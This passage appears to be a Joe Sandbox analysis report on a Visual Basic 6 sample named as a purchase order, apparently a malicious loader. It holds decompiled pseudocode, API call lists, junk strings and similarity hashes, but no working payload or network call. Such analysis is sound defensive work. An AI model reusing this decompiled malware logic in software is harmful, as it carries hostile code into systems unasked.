				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr* _v120;
				signed int _v124;
				intOrPtr _v128;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v208;
				intOrPtr _v212;
				signed int _t263;
				signed int _t267;
				char* _t269;
				signed int _t279;
				signed int _t282;
				signed int _t286;
				signed int _t290;
				intOrPtr _t292;
				signed int _t302;
				signed int _t306;
				short _t307;
				signed int _t311;
				signed int _t314;
				signed int _t318;
				signed int _t322;
				signed int _t323;
				intOrPtr _t331;
				char* _t337;
				signed int _t341;
				char* _t345;
				signed int _t349;
				short _t350;
				intOrPtr _t354;
				char* _t357;
				signed int _t358;
				signed int _t362;
				void* _t366;
				char* _t401;
				void* _t434;
				intOrPtr _t435;
				void* _t437;
				char* _t438;
				intOrPtr _t441;
				void* _t442;
				intOrPtr _t444;
				void* _t446;
				intOrPtr* _t447;

				_t437 = __esi;
				_t434 = __edi;
				_t366 = __ebx;
				_a4 = _a4 - 0xffff;
				_t441 = _t444;
				_push(0x401336);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t444;
				L00401330();
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = _t444;
				_v8 = 0x401290;
				L00401504();
				_v92 = L"windir";
				_v100 = 8;
				L0040151C();
				_push( &_v68);
				_push( &_v84);
				L00401522();
				if( *0x42a010 != 0) {
					_v132 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v132 = 0x42a010;
				}
				_t263 =  &_v52;
				L00401564();
				_v108 = _t263;
				_t267 =  *((intOrPtr*)( *_v108 + 0x130))(_v108,  &_v44, _t263,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x308))( *_v132));
				asm("fclex");
				_v112 = _t267;
				if(_v112 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x40fafc);
					_push(_v108);
					_push(_v112);
					L00401558();
					_v136 = _t267;
				}
				_push(0xf3);
				_push( &_v84);
				_t269 =  &_v40;
				_push(_t269);
				L0040142C();
				_push(_t269);
				L00401450();
				L00401588();
				_push(_t269);
				_push(_v44);
				L00401432();
				_v116 =  ~(0 | _t269 < 0x00000000);
				_push( &_v44);
				_push( &_v48);
				_push( &_v40);
				_push(3);
				L004014E0();
				L00401552();
				_push( &_v84);
				_push( &_v68);
				_push(2);
				L00401576();
				_t446 = _t444 + 0x1c;
				if(_v116 == 0) {
					L16:
					if( *0x42a010 != 0) {
						_v148 = 0x42a010;
					} else {
						_push(0x42a010);
						_push(0x4101d4);
						L0040155E();
						_v148 = 0x42a010;
					}
					_t279 =  &_v52;
					L00401564();
					_v108 = _t279;
					_t282 =  *((intOrPtr*)( *_v108 + 0x1c8))(_v108, _t279,  *((intOrPtr*)( *((intOrPtr*)( *_v148)) + 0x320))( *_v148));
					asm("fclex");
					_v112 = _t282;
					if(_v112 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x1c8);
						_push(0x40fabc);
						_push(_v108);
						_push(_v112);
						L00401558();
						_v152 = _t282;
					}
					L00401552();
					_v24 = 0xa2;
					_push(0x4279dd);
					L00401516();
					L00401516();
					return _t282;
				} else {
					if( *0x42a010 != 0) {
						_v140 = 0x42a010;
					} else {
						_push(0x42a010);
						_push(0x4101d4);
						L0040155E();
						_v140 = 0x42a010;
					}
					_t286 =  &_v52;
					L00401564();
					_v108 = _t286;
					_t290 =  *((intOrPtr*)( *_v108 + 0x128))(_v108,  &_v104, _t286,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x31c))( *_v140));
					asm("fclex");
					_v112 = _t290;
					if(_v112 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x128);
						_push(0x40fc94);
						_push(_v108);
						_push(_v112);
						L00401558();
						_v144 = _t290;
					}
					_t292 = _v36 - _v104;
					if(_t292 < 0) {
						L00401438();
						_t442 = _t446;
						_t447 = _t446 - 0xc;
						 *[fs:0x0] = _t447;
						L00401330();
						_v120 = _t447;
						_v116 = 0x4012a0;
						_v112 = 0;
						 *((intOrPtr*)( *_v100 + 4))(_v100, _t434, _t437, _t366, 0x60,  *[fs:0x0], 0x401336, _t441);
						L00401504();
						_v192 = 0x1311;
						_v188 = 1;
						_v136 = _v136 & 0x00000000;
						while(_v36 <= _v92) {
							if( *0x42a010 != 0) {
								_v104 = 0x42a010;
							} else {
								_push(0x42a010);
								_push(0x4101d4);
								L0040155E();
								_v104 = 0x42a010;
							}
							_t311 =  &_v52;
							L00401564();
							_v76 = _t311;
							_t314 =  *((intOrPtr*)( *_v76 + 0x1ac))(_v76, _t311,  *((intOrPtr*)( *((intOrPtr*)( *_v104)) + 0x348))( *_v104));
							asm("fclex");
							_v80 = _t314;
							if(_v80 >= 0) {
								_v108 = _v108 & 0x00000000;
							} else {
								_push(0x1ac);
								_push(0x40faec);
								_push(_v76);
								_push(_v80);
								L00401558();
								_v108 = _t314;
							}
							L00401552();
							_v60 = 0x80020004;
							_v68 = 0xa;
							if( *0x42a010 != 0) {
								_v112 = 0x42a010;
							} else {
								_push(0x42a010);
								_push(0x4101d4);
								L0040155E();
								_v112 = 0x42a010;
							}
							_t318 =  &_v52;
							L00401564();
							_v76 = _t318;
							_t322 =  *((intOrPtr*)( *_v76 + 0x48))(_v76,  &_v44, _t318,  *((intOrPtr*)( *((intOrPtr*)( *_v112)) + 0x364))( *_v112));
							asm("fclex");
							_v80 = _t322;
							if(_v80 >= 0) {
								_v116 = _v116 & 0x00000000;
							} else {
								_push(0x48);
								_push(0x40fb2c);
								_push(_v76);
								_push(_v80);
								L00401558();
								_v116 = _t322;
							}
							_t323 = 0x10;
							L00401330();
							_t438 =  &_v68;
							_t435 = _t447;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_push(L"NONASBESTINE");
							_push(L"OVERASSESSMENT");
							_push(L"ansamlende"); // executed
							L00401408(); // executed
							L00401588();
							_push(_t323);
							_push(_v44);
							L00401432();
							asm("sbb eax, eax");
							_v84 =  ~( ~( ~_t323));
							_push( &_v44);
							_push( &_v48);
							_push(2);
							L004014E0();
							_t447 = _t447 + 0xc;
							_t401 =  &_v52;
							L00401552();
							if(_v84 != 0) {
								while( *((intOrPtr*)(_v0 + 0x64)) < 0xd8) {
									_t183 = _v0 + 0x64; // 0x428a36
									_t354 =  *_t183 + 1;
									if(_t354 < 0) {
										L55:
										L00401438();
										_push(_t442);
										_push(_t401);
										_push(_t401);
										_push(0x401336);
										_push( *[fs:0x0]);
										 *[fs:0x0] = _t447;
										_push(0x38);
										L00401330();
										_push(_t366);
										_push(_t438);
										_push(_t435);
										_v212 = _t447;
										_v208 = 0x4012b0;
										if( *0x42a010 != 0) {
											_v72 = 0x42a010;
										} else {
											_push(0x42a010);
											_push(0x4101d4);
											L0040155E();
											_v72 = 0x42a010;
										}
										_t337 =  &_v36;
										L00401564();
										_v60 = _t337;
										_v44 = 0x80020004;
										_v52 = 0xa;
										L00401330();
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t341 =  *((intOrPtr*)( *_v60 + 0x174))(_v60, 0x10, _t337,  *((intOrPtr*)( *((intOrPtr*)( *_v72)) + 0x31c))( *_v72));
										asm("fclex");
										_v64 = _t341;
										if(_v64 >= 0) {
											_v76 = _v76 & 0x00000000;
										} else {
											_push(0x174);
											_push(0x40fc94);
											_push(_v60);
											_push(_v64);
											L00401558();
											_v76 = _t341;
										}
										L00401552();
										if( *0x42a010 != 0) {
											_v80 = 0x42a010;
										} else {
											_push(0x42a010);
											_push(0x4101d4);
											L0040155E();
											_v80 = 0x42a010;
										}
										_t345 =  &_v36;
										L00401564();
										_v60 = _t345;
										_t349 =  *((intOrPtr*)( *_v60 + 0x1a0))(_v60,  &_v56, _t345,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x320))( *_v80));
										asm("fclex");
										_v64 = _t349;
										if(_v64 >= 0) {
											_v84 = _v84 & 0x00000000;
										} else {
											_push(0x1a0);
											_push(0x40fabc);
											_push(_v60);
											_push(_v64);
											L00401558();
											_v84 = _t349;
										}
										_t350 = _v56;
										_v32 = _t350;
										L00401552();
										_push(0x427ea1);
										return _t350;
									}
									 *((intOrPtr*)(_v0 + 0x64)) = _t354;
									_t187 = _v0 + 0x60; // 0x80007
									_t401 = _v0;
									 *((intOrPtr*)(_t401 + 0x60)) =  *_t187;
								}
								_push(L"Fumlende3");
								_push(L"INTERBREEDS");
								_push(L"Genoptrykkenes4");
								_push(L"Cavernlike6"); // executed
								L00401402(); // executed
							}
							_t331 = _v36 + _v88;
							if(_t331 < 0) {
								goto L55;
							} else {
								_v36 = _t331;
								continue;
							}
							break;
						}
						if( *0x42a010 != 0) {
							_v120 = 0x42a010;
						} else {
							_push(0x42a010);
							_push(0x4101d4);
							L0040155E();
							_v120 = 0x42a010;
						}
						_t302 =  &_v52;
						L00401564();
						_v76 = _t302;
						_t306 =  *((intOrPtr*)( *_v76 + 0x108))(_v76,  &_v72, _t302,  *((intOrPtr*)( *((intOrPtr*)( *_v120)) + 0x330))( *_v120));
						asm("fclex");
						_v80 = _t306;
						if(_v80 >= 0) {
							_v124 = _v124 & 0x00000000;
						} else {
							_push(0x108);
							_push(0x40f9cc);
							_push(_v76);
							_push(_v80);
							L00401558();
							_v124 = _t306;
						}
						_t307 = _v72;
						_v40 = _t307;
						L00401552();
						_push(0x427cfc);
						L00401516();
						return _t307;
					} else {
						_v36 = _t292;
						L00401552();
						_v60 = 0x206e9a;
						_v68 = 3;
						_t357 =  &_v68;
						_push(_t357);
						L00401420();
						L00401588();
						_push(_t357);
						L00401426();
						L00401588();
						_t358 = _v48;
						_v124 = _t358;
						_v48 = _v48 & 0x00000000;
						_push(0xa9);
						L00401588();
						_push(_t358);
						L0040141A();
						L00401588();
						_push( &_v48);
						_push( &_v44);
						_push( &_v40);
						_push(3);
						L004014E0();
						L0040158E();
						_push(L"OPLBETS");
						L004014B0();
						L00401588();
						_t362 = _v48;
						_v128 = _t362;
						_v48 = _v48 & 0x00000000;
						_push(0);
						_push(0xffffffff);
						_push(1);
						_push(0x720035);
						L0040140E();
						L00401588();
						_push(_t362);
						L00401588();
						_push(_t362);
						_push(_v32);
						L00401414();
						L00401588();
						_push( &_v48);
						_push( &_v44);
						_push( &_v40);
						_push(3);
						L004014E0();
						goto L16;
					}
				}
				goto L70;
			}

0x00411225
0x00411225
0x00411225
0x00411225
0x00427607
0x0042760b
0x00427616
0x00427617
0x00427623
0x00427628
0x00427629
0x0042762a
0x0042762b
0x0042762e
0x0042763b
0x00427640
0x00427647
0x00427654
0x0042765c
0x00427660
0x00427661
0x0042766d
0x00427687
0x0042766f
0x0042766f
0x00427674
0x00427679
0x0042767e
0x0042767e
0x004276a2
0x004276a6
0x004276ab
0x004276ba
0x004276c0
0x004276c2
0x004276c9
0x004276e8
0x004276cb
0x004276cb
0x004276d0
0x004276d5
0x004276d8
0x004276db
0x004276e0
0x004276e0
0x004276ef
0x004276f7
0x004276f8
0x004276fb
0x004276fc
0x00427701
0x00427702
0x0042770c
0x00427711
0x00427712
0x00427715
0x00427723
0x0042772a
0x0042772e
0x00427732
0x00427733
0x00427735
0x00427740
0x00427748
0x0042774c
0x0042774d
0x0042774f
0x00427754
0x0042775d
0x004278f5
0x004278fc
0x00427919
0x004278fe
0x004278fe
0x00427903
0x00427908
0x0042790d
0x0042790d
0x0042793d
0x00427941
0x00427946
0x00427951
0x00427957
0x00427959
0x00427960
0x0042797f
0x00427962
0x00427962
0x00427967
0x0042796c
0x0042796f
0x00427972
0x00427977
0x00427977
0x00427989
0x0042798e
0x00427994
0x004279cf
0x004279d7
0x004279dc
0x00427763
0x0042776a
0x00427787
0x0042776c
0x0042776c
0x00427771
0x00427776
0x0042777b
0x0042777b
0x004277ab
0x004277af
0x004277b4
0x004277c3
0x004277c9
0x004277cb
0x004277d2
0x004277f1
0x004277d4
0x004277d4
0x004277d9
0x004277de
0x004277e1
0x004277e4
0x004277e9
0x004277e9
0x004277fb
0x004277fe
0x004279fa
0x00427a00
0x00427a02
0x00427a11
0x00427a1b
0x00427a23
0x00427a26
0x00427a2d
0x00427a3c
0x00427a45
0x00427a4a
0x00427a51
0x00427a58
0x00427a6d
0x00427a80
0x00427a9a
0x00427a82
0x00427a82
0x00427a87
0x00427a8c
0x00427a91
0x00427a91
0x00427ab5
0x00427ab9
0x00427abe
0x00427ac9
0x00427acf
0x00427ad1
0x00427ad8
0x00427af4
0x00427ada
0x00427ada
0x00427adf
0x00427ae4
0x00427ae7
0x00427aea
0x00427aef
0x00427aef
0x00427afb
0x00427b00
0x00427b07
0x00427b15
0x00427b2f
0x00427b17
0x00427b17
0x00427b1c
0x00427b21
0x00427b26
0x00427b26
0x00427b4a
0x00427b4e
0x00427b53
0x00427b62
0x00427b65
0x00427b67
0x00427b6e
0x00427b87
0x00427b70
0x00427b70
0x00427b72
0x00427b77
0x00427b7a
0x00427b7d
0x00427b82
0x00427b82
0x00427b8d
0x00427b8e
0x00427b93
0x00427b96
0x00427b98
0x00427b99
0x00427b9a
0x00427b9b
0x00427b9c
0x00427ba1
0x00427ba6
0x00427bab
0x00427bb5
0x00427bba
0x00427bbb
0x00427bbe
0x00427bc5
0x00427bcb
0x00427bd2
0x00427bd6
0x00427bd7
0x00427bd9
0x00427bde
0x00427be1
0x00427be4
0x00427bef
0x00427bf1
0x00427c00
0x00427c03
0x00427c06
0x00427d25
0x00427d25
0x00427d2a
0x00427d2d
0x00427d2e
0x00427d2f
0x00427d3a
0x00427d3b
0x00427d42
0x00427d45
0x00427d4a
0x00427d4b
0x00427d4c
0x00427d4d
0x00427d50
0x00427d5e
0x00427d78
0x00427d60
0x00427d60
0x00427d65
0x00427d6a
0x00427d6f
0x00427d6f
0x00427d93
0x00427d97
0x00427d9c
0x00427d9f
0x00427da6
0x00427db0
0x00427dba
0x00427dbb
0x00427dbc
0x00427dbd
0x00427dc6
0x00427dcc
0x00427dce
0x00427dd5
0x00427df1
0x00427dd7
0x00427dd7
0x00427ddc
0x00427de1
0x00427de4
0x00427de7
0x00427dec
0x00427dec
0x00427df8
0x00427e04
0x00427e1e
0x00427e06
0x00427e06
0x00427e0b
0x00427e10
0x00427e15
0x00427e15
0x00427e39
0x00427e3d
0x00427e42
0x00427e51
0x00427e57
0x00427e59
0x00427e60
0x00427e7c
0x00427e62
0x00427e62
0x00427e67
0x00427e6c
0x00427e6f
0x00427e72
0x00427e77
0x00427e77
0x00427e80
0x00427e84
0x00427e8b
0x00427e90
0x00000000
0x00427e90
0x00427c0f
0x00427c15
0x00427c18
0x00427c1b
0x00427c1b
0x00427c20
0x00427c25
0x00427c2a
0x00427c2f
0x00427c34
0x00427c34
0x00427a61
0x00427a64
0x00000000
0x00427a6a
0x00427a6a
0x00000000
0x00427a6a
0x00000000
0x00427a64
0x00427c45
0x00427c5f
0x00427c47
0x00427c47
0x00427c4c
0x00427c51
0x00427c56
0x00427c56
0x00427c7a
0x00427c7e
0x00427c83
0x00427c92
0x00427c98
0x00427c9a
0x00427ca1
0x00427cbd
0x00427ca3
0x00427ca3
0x00427ca8
0x00427cad
0x00427cb0
0x00427cb3
0x00427cb8
0x00427cb8
0x00427cc1
0x00427cc5
0x00427ccc
0x00427cd1
0x00427cf6
0x00427cfb
0x00427804
0x00427804
0x0042780a
0x0042780f
0x00427816
0x0042781d
0x00427820
0x00427821
0x0042782b
0x00427830
0x00427831
0x0042783b
0x00427840
0x00427843
0x00427846
0x0042784a
0x00427855
0x0042785a
0x0042785b
0x00427865
0x0042786d
0x00427871
0x00427875
0x00427876
0x00427878
0x00427883
0x00427888
0x0042788d
0x00427897
0x0042789c
0x0042789f
0x004278a2
0x004278a6
0x004278a8
0x004278aa
0x004278ac
0x004278b1
0x004278bb
0x004278c0
0x004278c7
0x004278cc
0x004278cd
0x004278d0
0x004278da
0x004278e2
0x004278e6
0x004278ea
0x004278eb
0x004278ed
0x00000000
0x004278f2
0x004277fe
0x00000000

APIs

__vbaChkstk.MSVBVM60(00000000,00401336,?,?,?,000000FF), ref: 00427623
__vbaStrCopy.MSVBVM60(?,?,?,00000000,00401336,?,?,?,000000FF), ref: 0042763B
__vbaVarDup.MSVBVM60 ref: 00427654
#666.MSVBVM60(?,?), ref: 00427661
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?), ref: 00427679
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?), ref: 004276A6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAFC,00000130,?,?,?,?,?,?,?,?), ref: 004276DB
__vbaStrVarVal.MSVBVM60(?,?,000000F3,?,?,?,?,?,?,?,?), ref: 004276FC
#616.MSVBVM60(00000000,?,?,000000F3,?,?,?,?,?,?,?,?), ref: 00427702
__vbaStrMove.MSVBVM60(00000000,?,?,000000F3,?,?,?,?,?,?,?,?), ref: 0042770C
__vbaStrCmp.MSVBVM60(00401336,00000000,00000000,?,?,000000F3,?,?,?,?,?,?,?,?), ref: 00427715
__vbaFreeStrList.MSVBVM60(00000003,?,00000000,00401336,00401336,00000000,00000000,?,?,000000F3), ref: 00427735
__vbaFreeObj.MSVBVM60 ref: 00427740
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0042774F
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00427776
__vbaObjSet.MSVBVM60(?,00000000), ref: 004277AF

Strings

windir, xrefs: 00427640
OPLBETS, xrefs: 00427888

Memory Dump Source

Source File: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$Free$ListNew2$#616#666CheckChkstkCopyHresultMove
String ID: OPLBETS$windir
API String ID: 1563069692-3744557485
Opcode ID: c04161e196cf6494114abc4e795c8f6a4d4bbebddb463804937a62cbdb0fd178
Instruction ID: 18e59619c9069ede41a3f669d18ce036a88f162e08fb907d03b0bf5ae33419a7
Opcode Fuzzy Hash: c04161e196cf6494114abc4e795c8f6a4d4bbebddb463804937a62cbdb0fd178
Instruction Fuzzy Hash: 82B12B71E00218AFDB10EFA5DC45EDEB7B8BF48308F50413AE416BB1A1DB785945CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00427158 Relevance: 70.3, APIs: 38, Strings: 2, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E00427158(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v52;
				char _v60;
				char _v76;
				char* _v100;
				char _v108;
				intOrPtr _v116;
				char _v124;
				void* _v128;
				signed int _v132;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				intOrPtr* _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				short _t123;
				char* _t130;
				signed int _t134;
				char* _t140;
				signed int _t144;
				signed int _t151;
				char* _t156;
				signed int _t160;
				void* _t204;
				void* _t206;
				intOrPtr _t207;
				void* _t208;

				_t207 = _t206 - 0xc;
				 *[fs:0x0] = _t207;
				L00401330();
				_v16 = _t207;
				_v12 = 0x401248;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401336, _t204);
				_v100 = L"10/10/10";
				_v108 = 8;
				L0040151C();
				_push( &_v60);
				_push( &_v76);
				L00401462();
				_v116 = 0xa;
				_v124 = 0x8002;
				_push( &_v76);
				_t123 =  &_v124;
				_push(_t123);
				L0040153A();
				_v128 = _t123;
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L00401576();
				_t208 = _t207 + 0xc;
				if(_v128 != 0) {
					_t151 = _a4;
					 *((intOrPtr*)(_t151 + 0x54)) = 0x11353c;
					_push(L"Fedthas");
					L00401456();
					L0040145C();
					_t24 = _a4 + 0x54; // 0x42799b
					 *(_a4 + 0x54) =  *_t24 ^ _t151;
					if( *0x42a010 != 0) {
						_v148 = 0x42a010;
					} else {
						_push(0x42a010);
						_push(0x4101d4);
						L0040155E();
						_v148 = 0x42a010;
					}
					_t156 =  &_v44;
					L00401564();
					_v128 = _t156;
					_t160 =  *((intOrPtr*)( *_v128 + 0x150))(_v128,  &_v32, _t156,  *((intOrPtr*)( *((intOrPtr*)( *_v148)) + 0x30c))( *_v148));
					asm("fclex");
					_v132 = _t160;
					if(_v132 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x150);
						_push(0x40f9cc);
						_push(_v128);
						_push(_v132);
						L00401558();
						_v152 = _t160;
					}
					_t46 = _a4 + 0x58; // 0x80007
					_push( *_t46);
					_push(0x7e);
					_push(_v32);
					L00401450();
					L00401588();
					_push(_a4);
					L004014FE();
					L00401588();
					L00401504();
					_push( &_v40);
					_push( &_v36);
					_push( &_v32);
					_push(3);
					L004014E0();
					_t208 = _t208 + 0x10;
					L00401552();
				}
				if( *0x42a010 != 0) {
					_v156 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v156 = 0x42a010;
				}
				_t130 =  &_v44;
				L00401564();
				_v128 = _t130;
				_v100 = 0x80020004;
				_v108 = 0xa;
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t134 =  *((intOrPtr*)( *_v128 + 0x1c8))(_v128, 0x10, _t130,  *((intOrPtr*)( *((intOrPtr*)( *_v156)) + 0x2fc))( *_v156));
				asm("fclex");
				_v132 = _t134;
				if(_v132 >= 0) {
					_v160 = _v160 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x40fafc);
					_push(_v128);
					_push(_v132);
					L00401558();
					_v160 = _t134;
				}
				L00401552();
				_push(0x40fc78);
				L004014CE();
				if(_t134 <= 0x310f) {
					_push( &_v60);
					L0040144A();
					_push( &_v60);
					L00401570();
					L00401588();
					L0040158E();
					if( *0x42a010 != 0) {
						_v164 = 0x42a010;
					} else {
						_push(0x42a010);
						_push(0x4101d4);
						L0040155E();
						_v164 = 0x42a010;
					}
					_t140 =  &_v44;
					L00401564();
					_v128 = _t140;
					_t144 =  *((intOrPtr*)( *_v128 + 0x1dc))(_v128,  &_v32, _t140,  *((intOrPtr*)( *((intOrPtr*)( *_v164)) + 0x35c))( *_v164));
					asm("fclex");
					_v132 = _t144;
					if(_v132 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0x1dc);
						_push(0x40fabc);
						_push(_v128);
						_push(_v132);
						L00401558();
						_v168 = _t144;
					}
					_v144 = _v32;
					_v32 = _v32 & 0x00000000;
					_v52 = _v144;
					_v60 = 8;
					_push(0x56);
					_push( &_v60);
					_push( &_v76);
					L00401444();
					_push( &_v76);
					L00401570();
					L00401588();
					L00401504();
					L00401516();
					L00401552();
					_push( &_v76);
					_t134 =  &_v60;
					_push(_t134);
					_push(2);
					L00401576();
				}
				asm("wait");
				_push(0x427547);
				L00401516();
				return _t134;
			}

0x0042715b
0x0042716a
0x00427176
0x0042717e
0x00427181
0x00427188
0x00427197
0x0042719a
0x004271a1
0x004271ae
0x004271b6
0x004271ba
0x004271bb
0x004271c0
0x004271c7
0x004271d1
0x004271d2
0x004271d5
0x004271d6
0x004271db
0x004271e2
0x004271e6
0x004271e7
0x004271e9
0x004271ee
0x004271f7
0x004271fd
0x00427200
0x00427207
0x0042720c
0x00427211
0x00427219
0x00427221
0x0042722b
0x00427248
0x0042722d
0x0042722d
0x00427232
0x00427237
0x0042723c
0x0042723c
0x0042726c
0x00427270
0x00427275
0x00427284
0x0042728a
0x0042728c
0x00427293
0x004272b2
0x00427295
0x00427295
0x0042729a
0x0042729f
0x004272a2
0x004272a5
0x004272aa
0x004272aa
0x004272bc
0x004272bc
0x004272bf
0x004272c1
0x004272c4
0x004272ce
0x004272d3
0x004272d4
0x004272de
0x004272eb
0x004272f3
0x004272f7
0x004272fb
0x004272fc
0x004272fe
0x00427303
0x00427309
0x00427309
0x00427315
0x00427332
0x00427317
0x00427317
0x0042731c
0x00427321
0x00427326
0x00427326
0x00427356
0x0042735a
0x0042735f
0x00427362
0x00427369
0x00427373
0x0042737d
0x0042737e
0x0042737f
0x00427380
0x00427389
0x0042738f
0x00427391
0x00427398
0x004273b7
0x0042739a
0x0042739a
0x0042739f
0x004273a4
0x004273a7
0x004273aa
0x004273af
0x004273af
0x004273c1
0x004273c6
0x004273cb
0x004273d4
0x004273dd
0x004273de
0x004273e6
0x004273e7
0x004273f1
0x004273f9
0x00427405
0x00427422
0x00427407
0x00427407
0x0042740c
0x00427411
0x00427416
0x00427416
0x00427446
0x0042744a
0x0042744f
0x0042745e
0x00427464
0x00427466
0x0042746d
0x0042748c
0x0042746f
0x0042746f
0x00427474
0x00427479
0x0042747c
0x0042747f
0x00427484
0x00427484
0x00427496
0x0042749c
0x004274a6
0x004274a9
0x004274b0
0x004274b5
0x004274b9
0x004274ba
0x004274c2
0x004274c3
0x004274cd
0x004274da
0x004274e2
0x004274ea
0x004274f2
0x004274f3
0x004274f6
0x004274f7
0x004274f9
0x004274fe
0x00427501
0x00427502
0x00427541
0x00427546

APIs

__vbaChkstk.MSVBVM60(?,00401336), ref: 00427176
__vbaVarDup.MSVBVM60 ref: 004271AE
#542.MSVBVM60(?,?), ref: 004271BB
__vbaVarTstGe.MSVBVM60(00008002,?,?,?,?,?), ref: 004271D6
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 004271E9
#581.MSVBVM60(Fedthas), ref: 0042720C
__vbaFpI4.MSVBVM60(Fedthas), ref: 00427211
__vbaNew2.MSVBVM60(004101D4,0042A010,Fedthas), ref: 00427237
__vbaObjSet.MSVBVM60(?,00000000), ref: 00427270
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040F9CC,00000150), ref: 004272A5
#616.MSVBVM60(?,0000007E,00080007), ref: 004272C4
__vbaStrMove.MSVBVM60(?,0000007E,00080007), ref: 004272CE
__vbaStrCat.MSVBVM60(00000000,?,0000007E,00080007), ref: 004272D4
__vbaStrMove.MSVBVM60(00000000,?,0000007E,00080007), ref: 004272DE
__vbaStrCopy.MSVBVM60(00000000,?,0000007E,00080007), ref: 004272EB
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,?,0000007E,00080007), ref: 004272FE
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00401336), ref: 00427309
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,00401336), ref: 00427321
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042735A
__vbaChkstk.MSVBVM60(?,00000000), ref: 00427373
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAFC,000001C8), ref: 004273AA
__vbaFreeObj.MSVBVM60(00000000,?,0040FAFC,000001C8), ref: 004273C1
#696.MSVBVM60(0040FC78), ref: 004273CB
#670.MSVBVM60(?,0040FC78), ref: 004273DE
__vbaStrVarMove.MSVBVM60(?,?,0040FC78), ref: 004273E7
__vbaStrMove.MSVBVM60(?,?,0040FC78), ref: 004273F1
__vbaFreeVar.MSVBVM60(?,?,0040FC78), ref: 004273F9
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,0040FC78), ref: 00427411
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042744A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FABC,000001DC), ref: 0042747F
#617.MSVBVM60(?,00000008,00000056), ref: 004274BA
__vbaStrVarMove.MSVBVM60(?,?,00000008,00000056), ref: 004274C3
__vbaStrMove.MSVBVM60(?,?,00000008,00000056), ref: 004274CD
__vbaStrCopy.MSVBVM60(?,?,00000008,00000056), ref: 004274DA
__vbaFreeStr.MSVBVM60(?,?,00000008,00000056), ref: 004274E2
__vbaFreeObj.MSVBVM60(?,?,00000008,00000056), ref: 004274EA
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,00000056), ref: 004274F9
__vbaFreeStr.MSVBVM60(00427547,0040FC78), ref: 00427541

Strings

10/10/10, xrefs: 0042719A
Fedthas, xrefs: 00427207

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
